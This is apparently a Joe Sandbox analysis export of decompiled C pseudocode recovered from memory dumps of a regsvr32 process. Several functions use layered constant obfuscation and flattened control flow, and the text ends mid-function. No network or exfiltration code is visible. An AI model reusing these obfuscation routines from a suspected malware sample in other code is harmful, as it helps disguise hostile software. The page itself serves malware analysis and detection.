Instruction ID: 52267fcceedb8c8fba7c05540b0d95e1027c83a531e127889f6d43c55aeb8ed3
Opcode Fuzzy Hash: dce44414a9fd22c85f69efb8f3c3662591a5d7bd55860f51b7a4ba16f9119897
Instruction Fuzzy Hash: 913178B26083468FD714CF25D88091BBBE1FBD8358F054A2DF89597250DBB1EA098B82

Uniqueness

Uniqueness Score: -1.00%

Function 003D0A27 Relevance: 1.3, Strings: 1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003D0A27(void* __ecx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t69;
				void* _t80;
				void* _t84;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				signed int* _t104;

				_t84 = __ecx;
				_t104 =  &_v32;
				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_t99 = _v20;
				_v16 = 0x330ec;
				_t69 = 0x3ed28;
				_v12 = 0xb69c7;
				do {
					while(_t69 != 0x3ed28) {
						if(_t69 == 0x98f54) {
							_v28 = 0xbd65b6;
							_v28 = _v28 ^ 0x08e94c79;
							_v28 = _v28 + 0x8b7b;
							_t94 = 0xb;
							_v28 = _v28 / _t94;
							_v28 = _v28 ^ 0x00c791d8;
							_v32 = 0xfe0d2f;
							_v32 = _v32 ^ 0x753c5140;
							_v32 = _v32 >> 0xb;
							_v32 = _v32 << 0xc;
							_v32 = _v32 ^ 0xeb85f98b;
							_v20 = 0x600839;
							_v20 = _v20 ^ 0x0a89cd84;
							_v20 = _v20 >> 0xc;
							_v20 = _v20 ^ 0x000a3d86;
							_v24 = 0xeaf183;
							_v24 = _v24 + 0xffd0;
							_v24 = _v24 | 0x935cd366;
							_v24 = _v24 ^ 0x93fa3724;
							_t99 = _t99 + E003D9E05(_v28, _t84 + 4, _v32, _v20, _v24);
						} else {
							if(_t69 != 0xa1dd6) {
								goto L6;
							} else {
								_v24 = 0x30c931;
								_t96 = 0x43;
								_v24 = _v24 / _t96;
								_v24 = _v24 ^ 0x0004badb;
								_v20 = 0x39f3d9;
								_t97 = 0x63;
								_push(_t84);
								_v20 = _v20 / _t97;
								_v20 = _v20 ^ 0x0007f5ce;
								_t80 = E003C87EC();
								_t104 =  &(_t104[1]);
								_t99 = _t99 + _t80;
								_t69 = 0x98f54;
								continue;
							}
						}
						L9:
						return _t99;
					}
					_t99 = 0;
					_t69 = 0xa1dd6;
					L6:
				} while (_t69 != 0xf0c74);
				goto L9;
			}

0x003d0a27
0x003d0a27
0x003d0a2a
0x003d0a2f
0x003d0a37
0x003d0a40
0x003d0a48
0x003d0a4b
0x003d0a58
0x003d0a58
0x003d0a61
0x003d0acf
0x003d0ad9
0x003d0ae1
0x003d0aef
0x003d0af5
0x003d0af9
0x003d0b01
0x003d0b09
0x003d0b11
0x003d0b16
0x003d0b1b
0x003d0b23
0x003d0b2b
0x003d0b33
0x003d0b38
0x003d0b40
0x003d0b48
0x003d0b50
0x003d0b58
0x003d0b78
0x003d0a63
0x003d0a65
0x00000000
0x003d0a67
0x003d0a67
0x003d0a77
0x003d0a7c
0x003d0a82
0x003d0a8a
0x003d0a96
0x003d0a99
0x003d0a9a
0x003d0a9e
0x003d0aae
0x003d0ab3
0x003d0ab6
0x003d0ab8
0x00000000
0x003d0ab8
0x003d0a65
0x003d0b7a
0x003d0b83
0x003d0b83
0x003d0abf
0x003d0ac1
0x003d0ac3
0x003d0ac3
0x00000000

Strings

@Q<u, xrefs: 003D0B09

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @Q<u
API String ID: 0-2226274282
Opcode ID: 5d87a7b5a4150bb47a1dd2d107f298e883db132cb823caba2bd86500c3084351
Instruction ID: 25790d336e4ce95d1d33e8b8cc281e66b0a9050018ac4a1805dec4209f08b11a
Opcode Fuzzy Hash: 5d87a7b5a4150bb47a1dd2d107f298e883db132cb823caba2bd86500c3084351
Instruction Fuzzy Hash: FA3147B26083428FC314CE66E44561BBBE1FBD8758F158E2EF49596260D3B5CA4D8FC2

Uniqueness

Uniqueness Score: -1.00%

Function 003C6F64 Relevance: 1.3, Strings: 1, Instructions: 84
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E003C6F64(void* __ecx, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t94;
				signed int _t100;
				signed int _t103;
				void* _t111;
				signed int _t112;

				_t112 = _a16;
				_t111 = __ecx;
				_v28 = 0xc1994;
				_v24 = 0;
				_v20 = 0;
				_t115 =  *((intOrPtr*)(0x3e2228 + _t112 * 4));
				if( *((intOrPtr*)(0x3e2228 + _t112 * 4)) == 0) {
					_v16 = 0x30cd4f;
					_v16 = _v16 << 0x10;
					_v16 = _v16 << 0xf;
					_v16 = _v16 ^ 0x800b6ebf;
					_v12 = 0x377c81;
					_t103 = 0x77;
					_push(_t103);
					_v12 = _v12 * 0x6f;
					_v12 = _v12 * 3;
					_v12 = _v12 ^ 0x4828b1ff;
					_v8 = 0xfd2bdc;
					_v8 = _v8 + 0x5d8;
					_v8 = _v8 + 0xffffdb8c;
					_v8 = _v8 / _t103;
					_v8 = _v8 ^ 0x0001edb9;
					_a16 = 0x1585f1;
					_a16 = _a16 * 0x75;
					_a16 = _a16 << 3;
					_a16 = _a16 * 5;
					_a16 = _a16 ^ 0x8976d4ca;
					_t94 = E003C75B1(_t115, _t103, _a12);
					_v8 = 0x4bea77;
					_v8 = _v8 ^ 0x84b242aa;
					_v8 = _v8 >> 0xb;
					_v8 = _v8 | 0x25b41493;
					_v8 = _v8 ^ 0x25bfbac7;
					_a16 = 0xd8c486;
					_t100 = 0x15;
					_push(_t94);
					_a16 = _a16 / _t100;
					_a16 = _a16 << 0x10;
					_a16 = _a16 + 0xfcd6;
					_a16 = _a16 ^ 0x52881383;
					_v16 = 0xc281fc;
					_v16 = _v16 * 0x1e;
					_v16 = _v16 ^ 0x16c43885;
					_push(_v16);
					_push(_t111);
					 *((intOrPtr*)(0x3e2228 + _t112 * 4)) = E003DF9C4(_v8, _a16);
				}
				return  *((intOrPtr*)(0x3e2228 + _t112 * 4));
			}

0x003c6f6b
0x003c6f71
0x003c6f73
0x003c6f7a
0x003c6f7d
0x003c6f80
0x003c6f87
0x003c6f8d
0x003c6f96
0x003c6f9a
0x003c6f9e
0x003c6fa5
0x003c6fb3
0x003c6fb4
0x003c6fb5
0x003c6fc0
0x003c6fc3
0x003c6fca
0x003c6fd1
0x003c6fd8
0x003c6fe4
0x003c6fe7
0x003c6fee
0x003c6ff9
0x003c6ffc
0x003c7004
0x003c7007
0x003c701a
0x003c701f
0x003c7028
0x003c7031
0x003c7035
0x003c703c
0x003c7043
0x003c704f
0x003c7052
0x003c7053
0x003c7056
0x003c705a
0x003c7061
0x003c7068
0x003c7073
0x003c7076
0x003c707d
0x003c7086
0x003c708f
0x003c7096
0x003c70a3

Strings

wK, xrefs: 003C701F

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: wK
API String ID: 0-2108386156
Opcode ID: 8ade7c4d1bdbdfb5f3ba9e5465c9b9db75777d1741ef7b0e0dc257d3a0bc478b
Instruction ID: 34c1943c852058a690330309b420c2561e8c08fc75959d1346daf0587f32b7c1
Opcode Fuzzy Hash: 8ade7c4d1bdbdfb5f3ba9e5465c9b9db75777d1741ef7b0e0dc257d3a0bc478b
Instruction Fuzzy Hash: 2941F571D0120DEFCB45CFA9E6458DEBBB5EB44304F10819EE811AB250D7749B14DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003C4D13 Relevance: 1.3, Strings: 1, Instructions: 61
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E003C4D13(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t63;
				intOrPtr _t78;
				signed int _t80;
				signed int _t81;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t63);
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v40 = 0xe02a9;
				_v36 = 0xbf450;
				_v20 = 0xe68ce5;
				_v20 = _v20 | 0xe884c383;
				_t80 = 3;
				_v20 = _v20 / _t80;
				_v20 = _v20 ^ 0x4da2450d;
				_v16 = 0xde9612;
				_v16 = _v16 << 0xf;
				_t81 = 0x11;
				_v16 = _v16 * 0x68;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0005fa97;
				_v12 = 0x12bb98;
				_v12 = _v12 ^ 0x19bfeac2;
				_v12 = _v12 + 0x453;
				_v12 = _v12 / _t81;
				_v12 = _v12 ^ 0x0180ebdb;
				_v24 = 0xd5f02f;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x0006cb6c;
				_v8 = 0xffc39b;
				_v8 = _v8 + 0xffff0174;
				_v8 = _v8 ^ 0x0832ef2c;
				_v8 = _v8 ^ 0x20b26d41;
				_v8 = _v8 ^ 0x287d326e;
				_t57 =  &_v8; // 0x287d326e
				_t78 =  *0x3e221c; // 0x0
				return E003DF4FB(_v16, _t78 + 0xc, _v12, __ecx, _v24, _v20,  *_t57);
			}

0x003c4d1a
0x003c4d1d
0x003c4d20
0x003c4d23
0x003c4d24
0x003c4d25
0x003c4d2a
0x003c4d30
0x003c4d34
0x003c4d3b
0x003c4d42
0x003c4d49
0x003c4d55
0x003c4d5a
0x003c4d5f
0x003c4d66
0x003c4d6d
0x003c4d75
0x003c4d76
0x003c4d79
0x003c4d7d
0x003c4d84
0x003c4d8b
0x003c4d92
0x003c4d9e
0x003c4da1
0x003c4da8
0x003c4daf
0x003c4db3
0x003c4dba
0x003c4dc1
0x003c4dc8
0x003c4dcf
0x003c4dd6
0x003c4ddd
0x003c4dea
0x003c4e02

Strings

n2}(, xrefs: 003C4DDD

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: n2}(
API String ID: 0-1920385427
Opcode ID: f0247207c3fe091839dc495f50a075019978f777854afc1b11bd530cd8ccadcd
Instruction ID: 081ebb07713ce75937278a2b1eeae1118cb695d8747ef02f3cf5865d3ad47986
Opcode Fuzzy Hash: f0247207c3fe091839dc495f50a075019978f777854afc1b11bd530cd8ccadcd
Instruction Fuzzy Hash: 9B213271C0021EEBCF04CFA6C94A9EEBBB5FB04308F108188D5116A210C3B40B589F90

Uniqueness

Uniqueness Score: -1.00%

Function 100203BE Relevance: .3, Instructions: 259
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E100203BE(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x100203c4
0x100203cd
0x100203d8
0x100203db
0x100203de
0x100203f0
0x100203f6
0x100203f9
0x100203fc
0x10020400
0x10020404
0x10020407
0x1002056c
0x10020572
0x10020575
0x10020578
0x1002057b
0x1002057e
0x10020585
0x1002058b
0x1002058c
0x1002058f
0x10020592
0x10020596
0x10020596
0x10020597
0x1002059b
0x100205a7
0x100205a8
0x100205ab
0x100205af
0x100205af
0x100205b3
0x100205b6
0x100205b8
0x100205bb
0x100205db
0x100205e5
0x100205e5
0x100205e9
0x100205eb
0x100205f2
0x100205f2
0x100205f4
0x100205f6
0x100205f9
0x100205f9
0x100205f9
0x100205f9
0x100205bd
0x100205c6
0x100205ca
0x100205cc
0x100205d0
0x100205d0
0x100205d2
0x100205d7
0x100205d7
0x100205d2
0x100205fc
0x100205fc
0x10020605
0x1002060e
0x10020614
0x10020617
0x1002061d
0x1002061e
0x10020621
0x10020625
0x10020625
0x10020621
0x10020626
0x1002062d
0x10020630
0x10020633
0x10020636
0x1002063c
0x10020642
0x10020645
0x10020647
0x1002064b
0x1002064e
0x10020651
0x10020651
0x10020653
0x10020657
0x1002067a
0x1002067e
0x1002068a
0x1002068d
0x1002068d
0x1002068d
0x1002068d
0x10020690
0x10020697
0x1002069a
0x10020659
0x10020659
0x1002065d
0x10020668
0x1002066b
0x1002066b
0x1002066b
0x1002066d
0x10020671
0x10020676
0x10020676
0x100206a1
0x100206a1
0x100206a1
0x100206a3
0x100206a6
0x100206a8
0x100206a8
0x100206ac
0x100206ae
0x00000000
0x100206ae
0x10020410
0x00000000
0x10020420
0x10020426
0x1002042a
0x1002042d
0x10020431
0x10020432
0x10020432
0x1002043b
0x10020440
0x1002046e
0x10020472
0x10020474
0x1002047b
0x1002047b
0x1002047d
0x1002047f
0x10020482
0x10020482
0x10020482
0x10020482
0x10020442
0x1002044c
0x10020450
0x10020452
0x10020456
0x10020458
0x1002045d
0x1002045d
0x10020458
0x10020440
0x1002048b
0x10020494
0x1002049c
0x100204a3
0x10020553
0x100204a9
0x100204b2
0x100204b3
0x100204ba
0x100204be
0x100204be
0x100204c2
0x100204c5
0x100204cb
0x100204ce
0x100204d1
0x100204d4
0x100204da
0x100204e3
0x100204e5
0x100204ec
0x100204ef
0x100204f1
0x100204f5
0x10020518
0x1002051c
0x1002051e
0x10020528
0x1002052b
0x1002052b
0x1002052b
0x1002052b
0x1002052e
0x10020535
0x10020535
0x10020538
0x100204f7
0x100204fb
0x10020509
0x10020509
0x1002050b
0x1002050f
0x10020514
0x10020514
0x1002053f
0x1002053f
0x10020541
0x10020544
0x10020547
0x1002054b
0x1002054d
0x1002054d
0x10020556
0x10020559
0x1002055c
0x00000000
0x1002055c

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: c143dd494f893cfde6ae3fabc72aca8beec4c6661b9fff683c2b4be286de1468
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: 95B17975A0075ADFDB15CF04D5D0A99BBA2FB48318F65C1ADE9095B382C731EA42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10017C6A Relevance: .2, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10017C6A(signed int* __ecx, void* __edi, signed int* _a4, signed int _a8) {
				unsigned int _v8;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v76;
				char _v88;
				char _v100;
				signed int _t111;
				signed int* _t117;
				void* _t121;
				void* _t122;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				intOrPtr* _t149;
				signed int _t150;
				signed char _t151;
				signed int _t154;
				signed int _t158;
				signed int _t188;
				signed int _t193;
				void* _t198;
				signed int _t199;
				signed int* _t202;
				void* _t203;
				signed short _t204;
				signed short _t205;
				signed int _t206;

				_t198 = __edi;
				_t202 = __ecx;
				_t150 = 0;
				_v16 = __ecx;
				if(__ecx[2] == 0) {
					_v28 =  *__ecx;
					_t111 = __ecx[1];
					_v24 = _t111;
					_v20 = 0;
					if(_a8 != 0) {
						if(_t111 < 0) {
							E100177DF( &_v28, E10017A43( &_v28,  &_v76));
						}
						_t154 = E1001CC02(_a8);
						_v8 = _t154;
						if(_v24 != _t150) {
							_v64 = _t154;
							_v48 = _t150;
							_v52 = _t150;
							_v44 = _t150;
							_v36 = _t150;
							_v40 = _t150;
							_v32 = _t150;
							_v60 = _t150;
							_v56 = _t150;
							if(E10017907( &_v28,  &_v64) == 0) {
								L38:
								if(((_t202[1] ^ _a8) & 0x80000000) != 0) {
									E100177DF( &_v52, E10017A43( &_v52,  &_v100));
								}
								_t117 = _a4;
								 *_t117 = _v52;
								_t117[1] = _v48;
								_t158 = _v44;
								goto L41;
							}
							_push(_t198);
							while(1) {
								_t199 = _v24;
								if(_t199 == _t150) {
									goto L17;
								}
								_t121 = 0x20;
								if((_t199 & 0x80000000) != 0) {
									L19:
									_t122 = _t121 + 0x20;
									L25:
									_t203 = 0x40;
									_t204 = _t203 - _t122;
									if(_t204 <= _t150) {
										L29:
										asm("sbb ebx, ebx");
										_t151 =  ~_t150;
										_v36 = _t199 / (_v8 >> _t151);
										if(_t204 <= 0) {
											L33:
											_t205 = _t204 - _t151;
											if(_t205 <= 0) {
												L36:
												E100177DF( &_v52, E1001792C( &_v52,  &_v76,  &_v40));
												E100177DF( &_v28, E100179B8( &_v28,  &_v100, E10017A8D( &_v40,  &_v88, _v8)));
												if(E10017907( &_v28,  &_v64) != 0) {
													_t150 = 0;
													continue;
												}
												_t202 = _v16;
												goto L38;
											}
											_t136 = _t205 & 0x0000ffff;
											do {
												_v40 = _v40 >> 1;
												_v40 = _v40 | _v36 << 0x0000001f;
												_t136 = _t136 - 1;
												_v36 = _v36 >> 1;
											} while (_t136 != 0);
											goto L36;
										}
										_t137 = _t204 & 0x0000ffff;
										do {
											_v28 = _v28 >> 1;
											_v28 = _v28 | _t199 << 0x0000001f;
											_t199 = _t199 >> 1;
											_t137 = _t137 - 1;
										} while (_t137 != 0);
										_v24 = _t199;
										goto L33;
									}
									_t138 = _t204 & 0x0000ffff;
									do {
										_v28 = _v28 << 1;
										_t199 = _t199 << 0x00000001 | _v28 >> 0x0000001f;
										_t138 = _t138 - 1;
									} while (_t138 != 0);
									_v24 = _t199;
									goto L29;
								} else {
									goto L15;
								}
								do {
									L15:
									_t121 = _t121 + 0xffff;
									_t193 = 1;
									_t52 = _t121 - 1; // -65504
